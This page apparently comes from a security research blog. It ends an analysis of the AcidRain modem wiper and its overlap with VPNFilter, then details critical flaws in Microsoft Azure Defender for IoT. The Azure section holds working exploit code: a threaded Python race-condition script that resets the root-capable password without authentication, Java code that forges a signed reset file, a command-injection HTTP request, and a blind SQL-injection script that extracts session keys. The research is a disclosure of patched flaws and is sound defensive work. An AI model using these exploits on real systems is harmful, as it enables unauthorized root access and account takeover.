SHA1 86906b140b019fdedaaba73948d0c8f96a6b1b42
MD5 ecbe1b1e30a1f4bffaf1d374014c877f
Name ukrop
Magic ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
First Seen 2022-03-15 15:08:02 UTC

AcidRain’s functionality is relatively straightforward and takes a bruteforce attempt that possibly signifies that the attackers were either unfamiliar with the particulars of the target firmware or wanted the tool to remain generic and reusable. The binary performs an in-depth wipe of the filesystem and various known storage device files. If the code is running as root, AcidRain performs an initial recursive overwrite and delete of non-standard files in the filesystem.

Recursively delete files in nonstandard folders

Following this, it attempts to destroy the data in the following storage device files:

Targeted Device(s) Description
/dev/sd* A generic block device
/dev/mtdblock* Flash memory (common in routers and IoT devices)
/dev/block/mtdblock* Another potential way of accessing flash memory
/dev/mtd* The device file for flash memory that supports fileops
/dev/mmcblk* For SD/MMC cards
/dev/block/mmcblk* Another potential way of accessing SD/MMC cards
/dev/loop* Virtual block devices

This wiper iterates over all possible device file identifiers (e.g., mtdblock0 – mtdblock99), opens the device file, and either overwrites it with up to 0x40000 bytes of data or (in the case of the /dev/mtd* device file) uses the following IOCTLS to erase it: MEMGETINFO, MEMUNLOCK, MEMERASE, and MEMWRITEOOB. In order to make sure that these writes have been committed, the developers run an fsync syscall.

The code that generates the malicious data used to overwrite storage

When the overwriting method is used instead of the IOCTLs, it copies from a memory region initialized as an array of 4-byte integers starting at 0xffffffff and decrementing at each index. This matches what others had seen after the exploit had taken place.

Side-by-side comparison of a Surfbeam2 modem pre- and post-attack

The code for both erasure methods can be seen below:

Mechanisms to erase devices: write 0x40000 (left) or use MEM* IOCTLS (right)

Once the various wiping processes are complete, the device is rebooted.

Redundant attempts to reboot the device

This results in the device being rendered inoperable.

An Interesting Oddity

Despite what the Ukraine invasion has taught us, wiper malware is relatively rare. More so wiper malware aimed at routers, modems, or IoT devices. The most notable case is VPNFilter, a modular malware aimed at SOHO routers and QNAP storage devices, discovered by Talos. This was followed by an FBI indictment attributing the operation to Russia (APT28, in particular). More recently, the NSA and CISA attributed VPNFilter to Sandworm (a different threat actor attributed to the same organization, the Russian GRU) as the U.K.’s National Cyber Security Centre (NCSC) described VPNFilter’s successor, Cyclops Blink.

VPNFilter included an impressive array of functionality in the form of multi-stage plugins selectively deployed to the infected devices. The functionality ranges from credential theft to monitoring Modbus SCADA protocols. Among its many plugins, it also included functionality to wipe and brick devices as well as DDoS a target.

The reason we bring up the specter of VPNFilter is not because of its superficial similarities to AcidRain but rather because of an interesting (but inconclusive) code overlap between a specific VPNFilter plugin and AcidRain.

VPNFilter Stage 3 Plugin – ‘dstr’

SHA256 47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6
SHA1 261d012caa96d3e3b059a98388f743fb8d39fbd5
MD5 20ea405d79b4de1b90de54a442952a45
Description VPNFilter Stage 3, ‘dstr’ module
Magic ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
First Seen 2018-06-06 13:02:56 UTC

After the initial discovery of VPNFilter, additional plugins were revealed by researchers attempting to understand the massive spread of the botnet and its many intricacies. Among these were previously unknown plugins, including ‘dstr’. As the mangled name suggests, it’s a ‘destruction’ module meant to supplement stage 2 plugins that lacked the ‘kill’ command meant to wipe the devices.

This plugin was brought to our attention initially by tlsh fuzzy hashing, a more recent matching library that’s proven far more effective than ssdeep or imphash in identifying similar samples. The similarity was at 55% to AcidRain with no other samples being flagged in the VT corpus. This alone is not nearly enough to conclusively judge the two samples as tied, but it did warrant further investigation.

VPNFilter and AcidRain are both notably similar and dissimilar. They’re both MIPS ELF binaries and the bulk of their shared code appears to stem from statically-linked libc. It appears that they may also share a compiler, most clearly evidenced by the identical Section Headers Strings Tables.

Section Headers Strings Tables for VPNFilter and AcidRain

And there are other development quirks, such as the storing of the previous syscall number to a global location before a new syscall. At this time, we can’t judge whether this is a shared compiler optimization or a strange developer quirk.

More notably, while VPNFilter and AcidRain work in very different ways, both binaries make use of the MEMGETINFO, MEMUNLOCK, and MEMERASE IOCTLS to erase mtd device files.

On the left, AcidRain; on the right, VPNFilter

There are also notable differences between VPNFilter’s ‘dstr’ plugin and AcidRain. The latter appears to be a far sloppier product that doesn’t consistently rise to the coding standards of the former. For example, note the redundant use of process forking and needless repetition of operations.

They also appear to serve different purposes, with the VPNFilter plugin targeting specific devices with hardcoded paths, and AcidRain taking more of a “one-binary-fits-all” approach to wiping devices. By brute forcing device filenames, the attackers can more readily reuse AcidRain against more diverse targets.

We invite the research community to stress test this developmental overlap and contribute their own findings.

Conclusions

As we consider what’s possibly the most important cyber attack in the ongoing Russian invasion of Ukraine, there are many open questions. Despite Viasat’s statement claiming that there was no supply-chain attack or use of malicious code on the affected routers, we posit the more plausible hypothesis that the attackers deployed AcidRain (and perhaps other binaries and scripts) to these devices in order to conduct their operation.

While we cannot definitively tie AcidRain to VPNFilter (or the larger Sandworm threat cluster), we note a medium-confidence assessment of non-trivial developmental similarities between their components and hope the research community will continue to contribute their findings in the spirit of collaboration that has permeated the threat intelligence industry over the past month.

References

https://www.wired.com/story/viasat-internet-hack-ukraine-russia/
https://www.cisa.gov/uscert/ncas/alerts/aa22-076a
https://media.defense.gov/2022/Jan/25/2002927101/-1/-1/0/CSA_PROTECTING_VSAT_COMMUNICATIONS_01252022.PDF
https://www.airforcemag.com/hackers-attacked-satellite-terminals-through-management-network-viasat-officials-say/
https://nps.edu/documents/104517539/104522593/RELIEF12-4_QLR.pdf/9cc03d09-9af4-410e-b601-a8bffdae0c30
https://www.reuters.com/business/media-telecom/exclusive-hackers-who-crippled-viasat-modems-ukraine-are-still-active-company-2022-03-30/
https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/
https://blog.talosintelligence.com/2018/05/VPNFilter.html
https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1
https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html
https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf
https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html
https://www.cisa.gov/uscert/ncas/alerts/aa22-054a

✇SentinelLabs

Pwning Microsoft Azure Defender for IoT | Multiple Flaws Allow Remote Code Execution for All

By: Kasif Dekel

By Kasif Dekel and Ronen Shustin (independent researcher)

Executive Summary

  • SentinelLabs has discovered a number of critical severity flaws in Microsoft Azure’s Defender for IoT affecting cloud and on-premise customers.
  • Unauthenticated attackers can remotely compromise devices protected by Microsoft Azure Defender for IoT by abusing vulnerabilities in Azure’s Password Recovery mechanism.
  • SentinelLabs’ findings were proactively reported to Microsoft in June 2021 and the vulnerabilities are tracked as CVE-2021-42310, CVE-2021-42312, CVE-2021-37222, CVE-2021-42313 and CVE-2021-42311 marked as critical, some with CVSS score 9.8.
  • Microsoft has released security updates to address these critical vulnerabilities. Users are encouraged to take action immediately.
  • At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.

Introduction

Operational technology (OT) networks power many of the most critical aspects of our society; however, many of these technologies were not designed with security in mind and can’t be protected with traditional IT security controls. Meanwhile, the Internet of Things (IoT) is enabling a new wave of innovation with billions of connected devices, increasing the attack surface and risk.

The problem has not gone unnoticed by vendors, and many offer security solutions in an attempt to address it, but what if the security solution itself introduces vulnerabilities? In this report, we will discuss critical vulnerabilities found in Microsoft Azure Defender for IoT, a security product for IoT/OT networks by Microsoft Azure.

First, we show how flaws in the password reset mechanism can be abused by remote attackers to gain unauthorized access. Then, we discuss multiple SQL injection vulnerabilities in Defender for IoT that allow remote attackers to gain access without authentication. Ultimately, our research raises serious questions about the security of security products themselves and their overall effect on the security posture of vulnerable sectors.

Microsoft Azure Defender For IoT

Microsoft Defender for IoT is an agentless network-layer security for continuous IoT/OT asset discovery, vulnerability management, and threat detection that does not require changes to existing environments. It can be deployed fully on-premises or in Azure-connected environments.

Source: Microsoft Azure Defender for IoT architecture

This solution consists of two main components:

  • Microsoft Azure Defender For IoT Management – Enables SOC teams to manage and analyze alerts aggregated from multiple sensors into a single dashboard and provides an overall view of the health of the networks.
  • Microsoft Azure Defender For IoT Sensor – Discovers and continuously monitors network devices. Sensors collect ICS network traffic using passive (agentless) monitoring on IoT and OT devices. Sensors connect to a SPAN port or network TAP and immediately begin performing DPI (Deep packet inspection) on IoT and OT network traffic.

Both components can be either installed on a dedicated appliance or on a VM.

Deep packet inspection (DPI) is achieved via the horizon component, which is responsible for analyzing network traffic. The horizon component loads built-in dissectors and can be extended to add custom network protocol dissectors.

Defender for IoT Web Interface Attack Surface

Both the management and the sensor share roughly the same code base, with configuration changes to fit the purpose of the machine. This is the reason why both machines are affected by most of the same vulnerabilities.

The most appealing attack surface exposed on both machines is the web interface, which allows controlling the environment in an easy way. The sensor additionally exposes another attack surface which is the DPI service (horizon) that parses the network traffic.

After installing and configuring the management and sensors, we are greeted with the login page of the web interface.

The same credentials are used also as the login credentials for the SSH server, which gives us some more insights into how the system works. The first thing we want to do is obtain the sources to see what is happening behind the scenes, so how do we get those?

Defender for IoT is a product formerly known as CyberX, acquired by Microsoft in 2020. Looking around in the home directory of the “cyberx” user, we found the installation script and a tar archive containing the system’s encrypted files. Reading the script we found the command that decrypts the archive file. A minified version:

openssl enc -d -aes256 -in ./product.tar.gz -md sha512 -k <KEY> | tar xz -C <TARGET_DIR>

The decryption key is shared across all installations.

After extracting the data we found the sources for the web interface ( written in Python) and got to work.

We first aimed to find any exposed unauthenticated APIs and look for vulnerabilities there.

Finding Potentially Vulnerable Controllers

The urls.py file contains the main routes for the web application:

xsense_routes = [
    ['handshake', XSenseHandshakeApiHandler]
]
 
xsense_v17_routes = [
    ['sync', xsense_v17.XSenseSyncApiHandler]
]
 
upgrade_v1_routes = [
    ['status', upgrade_v1.RemoteUpgradeStatusApiHandler],
    ['upgrade-log', upgrade_v1.RemoteUpgradeLogFileApiHandler]
]
 
token_v1_routes = [
    ['verify', token_v1.TokenVerificationHandlers],
    ['update-handshake', token_v1.UpdateHandshakeHandlers],
]
 
frontend_routes = [
 
    ['alerts', AlertsApiHandler],
    ['alerts/(?P[0-9]*)', AlertsApiHandler],
    ['alerts/scenarios', AlertScenariosApiHandler],
    <redacted>
]
management_routs = [
    ['backup/sync', ManagementApiHandler],
    ['backup/package', ManagementApiBackupHandler],
    ['backup/maintenance', MaintenanceApiHandler]
]
<redacted>

Using Jetbrains IntelliJ’s class hierarchy feature we can easily identify route controllers that do not require authentication.

Route controllers that do not require authentication

Every controller that inherits from BaseHandler and does not validate authentication or requires a secret token is a good candidate at this point. Some controllers drew our attention in particular.

Understanding Azure’s Password Recovery Mechanism

The password recovery mechanism for both the management and sensor operates as follows:

  1. Access to management/sensor URL (e.g., https://ip/login#/dashboard)
  2. Go to the “Password Recovery” page.
  3. Copy the ApplianceID provided in this page to the Azure console and get a password reset ZIP file which you upload in the password reset page.
  4. Upload the signed ZIP file to the management/sensor Password Recovery page using the mentioned form in Step 2. This ZIP contains digitally-signed proof that the user is the owner of this machine, by way of digital certificates and signed data.
  5. A new password is generated and displayed to the user

Under the hood:

  1. The actual process is divided into two requests to the management/sensor server:
    1. Upload of the signed ZIP proof
    2. Password recovery
  2. When a ZIP file is uploaded, it is being extracted to the /var/cyberx/reset_password directory (handled by ZipFileConfigurationApiHandler).
  3. When a password recovery request is being processed, the server performs the following operations:
    1. The PasswordRecoveryApiHandler controller validates the certificates. This validates that the certificates are properly signed by a Root CA. in addition, it checks whether these certificates belong to Azure servers.
    2. A request is sent to an internal Tomcat server to further validate the properties of the machine.
    3. If all checks pass properly, PasswordRecoveryApiHandler generates a new password and returns it to the user.

The ZIP contains the following files:

  • IotDefenderSigningCertificate.pem – Azure public key, used to verify the data signature in ResetPassword.json, signed by issuer.pem.
  • Issuer.pem – Signs IotDefenderSigningCertificate.pem, signed by a trusted root CA.
  • ResetPassword.json – JSON application data, properties of the machine.

The content of the ResetPassword.json file looks as follows:

{
  "properties": {
    "tenantId": "<TENANTID>",
    "subscriptionId": "<SUBSCRIPTIONID>",
    "type": "PasswordReset",
    "applianceId": "<APPLIANCEID>",
    "issuanceDate": "<ISSUANCEDATA>"
  },
  "signature": "<BASE64_SIGNATURE>"
}

According to Step 2, the code that processes file uploads to the reset_password directory (components\xsense-web\cyberx_web\api\admin.py:1508) looks as follows:

class ZipFileConfigurationApiHandler(BaseHandler):
    def _post(self):
        path = self.request.POST.get('path')
        approved_path = ['licenses', 'reset_password']
 
        if path not in approved_path:
            raise Exception("provided path is not approved")
 
        path = os.path.join('/var/cyberx', path)
        cyberx_common.clear_directory_content(path)
 
        files = self.request.FILES
        for file_name in files:
            license_zip = files[file_name]
            zf = zipfile.ZipFile(license_zip)
            zf.extractall(path=path)

As shown, the code extracts the user delivered ZIP to the mentioned directory, and the following code handles the password recovery requests (cyberx python library file django_helpers.py:576):

class PasswordRecoveryApiHandler(BaseHandler):
    def _get(self):
        global host_id
 
        if not host_id:
            host_id = common.get_system_id()
            host_id = common.add_dashes(host_id)
 
        return {
            'instanceId': host_id
        }
 
    def _post(self):
        print 'resetting user password'
        result = {}
        try:
            body = self.parse_body()
            user = body.get('user')
 
            if user != 'cyberx' and user != 'support':
                raise Exception('Invalid user')
 
            try:
                self._try_reset_password() 
            except Exception as e:
                logging.error('could not verify activation certificate, error {}'.format(e.message))
                result = {
                    "internalSystemErrorMessage": '',
                    "userDisplayErrorMessage": 'This password recovery file is invalid.' +
                                                  'Download a new file. If this does not work, contact support.'
                }
 
            url = "http://127.0.0.1:9090/core/api/v1/login/reset-password"
            r = requests.post(url=url)
            r.raise_for_status()
 
            # Reset passwords
 
            user_new_password = common.generate_password()
            self._set_user_password(user, user_new_password)
 
            if not result:
                result = {
                    'newPassword': user_new_password
                }
        finally:
            clear_directory_content('/var/cyberx/reset_password')
 
        return result

The function first validates the provided user and calls the function _try_reset_password:

 def _try_reset_password(self):
        license_signing_certificate_path = os.path.join(RESET_PASSWORD_DIR_PATH, SIGNING_CERTIFICATE_FILE_NAME)
        intermediate_issuer_certificate_path = os.path.join(RESET_PASSWORD_DIR_PATH, ISSUER_CERTIFICATE_FILE_NAME)
 
        cert_data = ssl.verify_certificate(intermediate_issuer_certificate_path, license_signing_certificate_path)
        certificate = load_certificate(FILETYPE_PEM, cert_data)
        print 'validating subject'
        ssl.verify_subject(certificate)
        print 'validating issuer'
        ssl.verify_issuer(certificate)

Internally, this code validates the certificates, including the issuer.

Afterwards, a request to an internal API http://127.0.0.1:9090/core/api/v1/login/reset-password is made and handled by a Java component that eventually executes the following code:

public class ResetPasswordManager {
  private static final Logger LOGGER = LoggerFactory.getLogger(ResetPasswordManager.class);
  private static final String RESET_PASSWORD_CERTIFICATE_PATH = "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem"; 
  private static final String RESET_PASSWORD_JSON_PATH = "/var/cyberx/reset_password/ResetPassword.json";
  
  private static final ActivationConfiguration ACTIVATION_CONFIGURATION = new ActivationConfiguration();
  
  public static void resetPassword() throws Exception {
    LOGGER.info("Trying to reset password");
    JSONObject resetPasswordJson = new JSONObject(FileUtils.read("/var/cyberx/reset_password/ResetPassword.json"));
    ResetPasswordProperties resetPasswordProperties = (ResetPasswordProperties)JsonSerializer.fromString(resetPasswordJson
        .getJSONObject("properties").toString(), ResetPasswordProperties.class);
    boolean signatureValid = CryptographyUtils.isSignatureValid(JsonSerializer.toString(resetPasswordProperties).getBytes(StandardCharsets.UTF_8), resetPasswordJson
        .getString("signature"), "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem");
    if (!signatureValid) {
      LOGGER.error("Signature validation failed");
      throw new Exception("This signature file is not valid");
    } 
    String subscriptionId = resetPasswordProperties.getSubscriptionId();
    String machineSubscriptionId = ACTIVATION_CONFIGURATION.getSubscriptionId();
    if (!machineSubscriptionId.equals("") && 
      !machineSubscriptionId.contains(resetPasswordProperties.getSubscriptionId())) {
      LOGGER.error("Subscription ID didn't match");
      throw new Exception("This signature file is not valid");
    } 
    DateTime issuanceDate = 
 
DateTimeFormat.forPattern("MM/dd/yyyy").parseDateTime(resetPasswordProperties.getIssuanceDate()).withTimeAtStartOfDay();
    if (DateTime.now().withTimeAtStartOfDay().minusDays(7).isAfter((ReadableInstant)issuanceDate)) {
      LOGGER.error("Password reset file expired");
      throw new Exception("Password reset file expired");
    } 
    if (!Environment.getSensorUUID().replace("-", "").equals(resetPasswordProperties.getApplianceId().trim().toLowerCase().replace("-", ""))) {
      LOGGER.error("Appliance id not equal to real uuid");
      throw new Exception("Appliance id not equal to real uuid");
    } 
  }
}

This code validates the password reset files yet again. This time it also validates the signature of the ResetPassword.json file and its properties.

If all goes well and the Java API returns 200 OK status code, the PasswordRecoveryApiHandler controller proceeds and generates a new password and returns it to the user.

Vulnerabilities in Defender for IOT

As shown, the password recovery mechanism consists of two main entities:

  • The Python web API (external)
  • The Java web API (tomcat, internal)

This introduces a time-of-check-time-of-use (TOCTOU) vulnerability, since no synchronization mechanism is applied.

As mentioned, the reset password mechanism starts with a ZIP file upload. This primitive lets us upload and extract any files to the /var/cyberx/reset_password directory.

There is a window of opportunity in this flow that makes it possible to change the files in /var/cyberx/reset_password between the first verification (Python API) and the second verification (Java API) in a way that the Python API validates that the files are correctly signed by Azure certificates. Then the Java API processes the replaced specially crafted files that causes it to falsely approve their authenticity and return the 200 OK status code.

The password recovery Java API contains logical flaws that let specially-crafted payloads bypass all verifications.

The Java API validates the signature of the JSON file (same code as above):

JSONObject resetPasswordJson = new JSONObject(FileUtils.read("/var/cyberx/reset_password/ResetPassword.json"));
    ResetPasswordProperties resetPasswordProperties = (ResetPasswordProperties)JsonSerializer.fromString(resetPasswordJson
        .getJSONObject("properties").toString(), ResetPasswordProperties.class);
    boolean signatureValid = CryptographyUtils.isSignatureValid(JsonSerializer.toString(resetPasswordProperties).getBytes(StandardCharsets.UTF_8), resetPasswordJson
        .getString("signature"), "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem");
    if (!signatureValid) {
      LOGGER.error("Signature validation failed");
      throw new Exception("This signature file is not valid");
    } 

The issue here is that it doesn’t verify the IotDefenderSigningCertificate.pem certificate as opposed to the Python API verification. It only checks that the signature in the JSON file is signed by the attached certificate file. This introduces a major flaw.

An attacker can therefore generate a self-signed certificate and sign the ResetPassword.json payload that will pass the signature verification.

As already mentioned, the ResetPassword.json looks like the following:

{
  "properties": {
    "tenantId": "<TENANTID>",
    "subscriptionId": "<SUBSCRIPTIONID>",
    "type": "PasswordReset",
    "applianceId": "<APPLIANCEID>",
    "issuanceDate": "<ISSUANCEDATA>"
  },

Afterwards, there is a subscription ID check:

  String subscriptionId = resetPasswordProperties.getSubscriptionId();
    String machineSubscriptionId = ACTIVATION_CONFIGURATION.getSubscriptionId();
    if (!machineSubscriptionId.equals("") && 
      !machineSubscriptionId.contains(resetPasswordProperties.getSubscriptionId())) {
      LOGGER.error("Subscription ID didn't match");
      throw new Exception("This signature file is not valid");
    } 

This is the only property that cannot be obtained by a remote attacker and is infeasible to guess in a reasonable time. However, this check can be easily bypassed.

The code takes the subscriptionId from the JSON file and compares it to the machineSubscriptionId. However, the code here is flawed. It checks if machineSubscriptionId contains the subscriptionId from the user controlled JSON file and not the other way around. The use of .contains() is entirely insecure. The subscriptionId is in the format of a GUID, which means it must contain a hyphen. This allows us to bypass this check by only providing a single hyphen character.

Next, the issuanceDate is checked, followed by ApplianceId. This is already supplied to us by the password recovery page (mentioned in Step 2).

Now we understand that we can bypass all of the checks in the Java API, meaning that we only need to successfully win the race condition and ultimately reset the password without authorization.

The fact that the ZIP upload interface and password recovery interface are divided came in handy in the exploitation phase and lets us win the race more easily.

Preparing To Attack Azure Defender For IoT

To prepare the attack we need to do the following.

  1. Obtain a legitimate password recovery ZIP file from the Azure portal. Obviously, we cannot access the Azure user that the victim machine belongs to, but we can use any Azure user and generate a “dummy” ZIP file. We only need the recovery ZIP file to obtain a legitimate certificate. This can be done at the following URL:
    https://portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites
    

    For that matter, we can create a new trial Azure account and generate a recovery file using that interface mentioned above. The secret identifier is irrelevant and may contain garbage.

  2. Then we need to generate a specially crafted (“bad”) ZIP file. This ZIP file will contain two files:
    • IotDefenderSigningCertificate.pem – a self-signed certificate. It can be generated by the following command:
      openssl     req  -x509   -nodes     -newkey rsa:2048     -keyout key.pem     -out IotDefenderSigningCertificate.pem     -subj "/C=DE/ST=NRW/L=Berlin/O=My Inc/OU=ALEG/CN=www.example.com/[email protected]"
      
    • ResetPassword.json – properties data JSON file, signed by the self-signed certificate mentioned above and modified accordingly to bypass the Java API verifications.

This JSON file can be signed using the following Java code:

import com.cyberx.infrastructure.common.configuration.ActivationConfiguration;
import com.cyberx.infrastructure.common.serializers.JsonSerializer;
import com.cyberx.infrastructure.common.utils.CryptographyUtils;
import com.cyberx.infrastructure.common.utils.FileUtils;
import com.cyberx.infrastructure.models.pojos.ResetPasswordProperties;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import org.joda.time.DateTime;
import org.joda.time.ReadableInstant;
import org.joda.time.format.DateTimeFormat;
import org.json.JSONObject;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.commons.codec.binary.Base64;
 
    public static void sign() {
        String data = "{\"tenantId\":\"<redacted>\",\"subscriptionId\":\"-\",\"type\":\"PasswordReset\",\"applianceId\":\"<redacted>\",\"issuanceDate\":\"06/19/2021\"}";
        try {
            String signature = Base64.encodeBase64String(CryptographyUtils.rsaSign("C:\\key.pem", data.getBytes()));
            JSONObject jsonData = new JSONObject(data);
            JSONObject completeData = new JSONObject();
            completeData.put("properties", jsonData);
            completeData.put("signature", signature);
            System.out.println(completeData.toString());
            FileUtils.write("C:\\ResetPassword.json", completeData.toString());
        } catch (GeneralSecurityException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

As mentioned, the applianceId is obtained from the password recovery page. The tenantId is not verified, thus can be anything.

The issuanceDate parameter is self explanatory.

Once generated and signed, it can be added to a ZIP archive and be used by the following Python exploit script:

import requests
import threading
import time
import sys
from urllib3.exceptions import InsecureRequestWarning
 
 
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
 
HOST = "192.168.1.130"
BENIGN_RESET_PATH = "./benign.zip"
MALICIOUS_RESET_PATH = "./malicious.zip"
 
 
BENIGN_DATA = open(BENIGN_RESET_PATH, "rb+").read()
MALICIOUS_DATA = open(MALICIOUS_RESET_PATH, "rb+").read()
 
 
def upload_reset_file(data, timeout=0):
    headers = {
        "X-CSRFTOKEN": "aaaa",
        "Referer": "https://{0}/login".format(HOST),
        "Origin": "https://{0}".format(HOST)
    }
 
    cookies = {
        "csrftoken": "aaaa"
    }
    files = {"file": data}
    data = {"path": "reset_password"}
    while True:
        requests.post("https://{0}/api/configuration/zip-file".format(HOST), data=data, files=files, headers=headers, cookies=cookies, verify=False)
        if not timeout:
            time.sleep(timeout)
 
def recover_password():
    headers = {
        "X-CSRFTOKEN": "aaaa",
        "Referer": "https://{0}/login".format(HOST),
        "Origin": "https://{0}".format(HOST)
    }
 
    cookies = {
        "csrftoken": "aaaa"
    }
    data = {"user": "cyberx"}
    while True:
        req = requests.post("https://{0}/api/authentication/recover".format(HOST), json=data, headers=headers, cookies=cookies, verify=False)
        if b"newPassword" in req.content:
            print(req.content)
            sys.exit(1)
 
 
def main():
 
    looper_benign = threading.Thread(target=upload_reset_file, args=(BENIGN_DATA, 0), daemon=True)
    looper_malicious = threading.Thread(target=upload_reset_file, args=(MALICIOUS_DATA, 1), daemon=True)
    looper_recover = threading.Thread(target=recover_password, args=(), daemon=True)
 
    looper_benign.start()
    looper_malicious.start()
    looper_recover.start()
 
 
    looper_recover.join()
   
 
if __name__ == '__main__':
    main()

The benign.zip file is the ZIP file obtained from the Azure portal, as described above and the malicious.zip file is the mentioned specially-crafted ZIP file as described above.

The exploit script above performs the TOCTOU attack to reset and receive the password of the cyberx username without authentication at all. It does so by utilizing three threads:

  • looper_benign – responsible for uploading the benign ZIP file in an infinite loop
  • looper_malicious – the same as looper_benign but uploads the malicious ZIP, in this configuration with a 1 second timeout
  • looper_recover – sends the password recovery request to trigger the vulnerable code

Somewhat unfortunately, the documentation mentions that the ZIP file cannot be tampered with.

This vulnerability is addressed as part of CVE-2021-42310.

Unauthenticated Remote Code Execution As Root #1

At this point, we can obtain a password for the privileged user cyberx. This allows us to login to the SSH server and to execute code as root. Even without this, an attacker could use a stealthier approach to execute code.

After logging in with the obtained password, the attack surface is vastly increased. For example, we found a simple command injection vulnerability within the change password mechanism:

From components\xsense-web\cyberx_web\api\authentication.py:151:

   def _post(self):
        try:
            body = self.parse_body()
            password = body['password']
            username = body['username'].lower()  # Lower case the username mainly because it does not matter
            ip_address = self.get_client_ip_address()
 
            # 1. validate credentials:
            try:
                logging.info('validate credentials...')
                user = LoginApiHandler.validate_credentials_and_get_user(username, password, ip_address)
            except UserFriendlyException as e:
                raise e
            except Exception as e:
                logging.error('User authentication failure', exc_info=True)
                raise UserFriendlyException('User authentication failure', e.message)
 
            # 2. validate new password:
            new_password = body['new_password']
            err_message = UserPasswordApiHandler.validate_password(new_password)
            if err_message:
                raise UserFriendlyException("Password doesn't match security policy", err_message)
 
            # 3. change password:
            user.set_password(new_password)
            user.save()
            process.run('sudo /usr/local/bin/cyberx-users-password-reset -u {username} -p {password}'
                        .format(username=user.get_username().encode('utf-8'), password=new_password), hide_output=True)
            return {'msg': 'Password has been replaced.'}
        except UserFriendlyException as e:
            raise e
        except Exception as e:
            raise UserFriendlyException("Unable to set password.", e.message)

The function receives three JSON fields from the user, “username”, “password”, “new_password”.

First, it validates the username and password, which we already have. Next, it only checks the complexity of the password using regex, but does not sanitize the input for command injection primitives.

After the validation it executes the /usr/local/bin/cyberx-users-password-reset script as root with the username and new password controlled by an attacker. As the function doesn’t sanitize the input of “new_password” properly, we can inject any command we choose. Our command will then be executed as root with the help of sudo because the cyberx user is a sudoer. This lets us execute code as a root user:

This can be exploited with the following HTTP packet:

POST /api/external/authentication/set_password HTTP/1.1
Host: 192.168.1.130
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-CSRFTOKEN: aaaa
Referer: https://192.168.1.130/login
Origin: https://192.168.1.130
Cookie: cyberx-version=10.3.1.7-r-55a4f94; csrftoken=aaaa; sessionid=kcnjq7wby7c28rxnppcex20gkajej3km; RELOCATE_URL=
Content-Length: 100
Content-Type: multipart/form-data; boundary=47dd42bb4cf2abb6e9c4c81019d8fbb4
 
{"username" : "cyberx", "password" : "",
"new_password": "``"}

This vulnerability is addressed as part of CVE-2021-42312.

POC

In the remainder of this post, we present two additional routes and new vulnerabilities as well as a vulnerability in the traffic processing framework.

These vulnerabilities are basic SQL Injections (with a twist), yet they have a high impact on the security of the product and the organization’s network.

CVE-2021-42313

The DynamicTokenAuthenticationBaseHandler class inherits from BaseHandler and does not require authentication. This class contains two functions (get_version_from_db, uuid_is_connected) which are prone to SQL injection .

def get_version_from_db(self, uuid):
    version = None
    with MySQLClient("127.0.0.1", mysql_user, mysql_password, "management") as client:
        logger.info("fetching the sensor version from db")
        xsenses = client.execute_select_query(
            "SELECT id, UID, version FROM xsenses WHERE UID = '{}'".format(uuid))
        if len(xsenses) > 0:
            version = xsenses[0]['version']
            logger.info("sensor version according to db is: {}".format(version))
        else:
            logger.info("sensor not in db")
    return version
    
def uuid_is_connected(self, uuid):
    with MySQLClient("127.0.0.1", mysql_user, mysql_password, "management") as client:
        xsenses = client.execute_select_query(
            "SELECT id, UID, version FROM xsenses WHERE UID = '{}'".format(uuid))
        result = len(xsenses) > 0
    return result

As shown, the UUID parameter is not sanitized and formatted into an SQL query. There are a couple of classes which inherit DynamicTokenAuthenticationBaseHandler. The flow to the vulnerable functions actually exists in the token validation process.

Therefore, we can trigger the SQL injection without authentication.

These vulnerabilities can be triggered from:

  1. api/sensors/v1/sync
  2. api/v1/upgrade/status
  3. api/v1/upgrade/upgrade-log

It is worth noting that the function execute_select_query internally calls to the SQL execute, API which supports stacked queries. This makes the “simple” select SQL injection a more powerful primitive (aka executing any query using ‘;’). In our testing we managed to insert, update, and execute SQL special commands.

For the PoC of this vulnerability, we used the api/sensors/v1/sync API. We created the following script to extract a logged in user session id from the database, which eventually allows us to take over the account.

import requests
import datetime
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
HOST = "https://192.168.126.150"
 
def startAttack():
    sessionKey = ""
    for currChr in range(1, 40):
        bitStr = ""
        for currBit in range(0, 8):
            sql = "aleg' union select if(ord(substr((SELECT session_key from django_session WHERE LENGTH(session_data) > 70 ORDER BY expire_date DESC LIMIT 1),{0},1)) >>{1} & 1 = 1 ,sleep(3),0),2,3 -- a".format(currChr, currBit)
 
            body = {
                "token": "aleg",
                "uid": sql
            }
 
            now = datetime.datetime.now()
            res = requests.post(HOST + "/api/sensors/v1/sync", json=body, verify=False)
            if (datetime.datetime.now() - now).seconds > 2:
                bitStr += "1"
                print(1)
            else:
                bitStr += "0"
                print(0)
 
        final = bitStr[::-1]
        print(final)
        print(int(final, 2))
        chrNum = int(final, 2)
 
        if not chrNum:
            return
            
        sessionKey += chr(chrNum)
        print("SessionKey: " + sessionKey)
 
            
 
def main():
    startAttack()
 
if __name__ == "__main__":
    main()

An example of this script output:

After extracting the session id from the database, we can log in to the management web interface, at which point there are several methods to execute code as root. For example, we could change the password and login to the SSH server (these users are sudoers), use the script scheduling mechanism, or use the command injection vulnerability we mentioned earlier in this post.

